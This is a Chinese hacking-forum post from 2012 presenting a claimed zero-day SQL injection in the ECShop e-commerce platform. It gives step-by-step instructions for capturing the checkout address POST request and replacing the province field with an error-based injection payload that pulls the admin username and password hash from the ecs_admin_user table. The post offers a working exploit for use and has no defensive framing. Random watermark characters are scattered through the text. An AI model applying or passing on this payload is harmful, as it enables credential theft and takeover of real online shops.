找回密码
 立即注册
查看: 2658|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
感谢欠杀的黑盒5 _* o9 ?; e+ c/ |

1 m+ P, y; x1 Z
+ F- a7 Z1 j8 X# {# I8 L# H5 S0 c把任意商品加入购物车在填写配送地址那一页,有地区选择
4 S0 n0 a) G4 [
! K" O$ J. j% D- xflow.php?step=consignee&direct_shopping=1$ r6 \; n4 i. R  S* e* o' a4 M
比如省选择安徽: i6 u1 K( q# V; ~2 J) h$ b. f
1 l/ h1 B1 S- A% q
其中POST数据如下
  \/ \3 M/ ]1 L) v- D
5 v2 v9 W; y. s( I. y( scountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
+ g' }4 `( S" o. M改成
2 d8 \0 B, y" Q  [* [" S
% y# \2 q% A, mprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #- A- K& h! h  m
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..' K' R, m  {7 Q. ], D3 D# B

3 b! w# w3 p2 F# U* j6 s9 O先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
& ^+ Y- X. J# l 9 z0 ], J# T) w2 ?6 y
就会回显错误页面了。。。。
+ ]+ x# g3 r3 \0 U3 u* y 1 f3 z9 _0 z/ H( v* I
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
# d5 P5 q  I- [/ I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表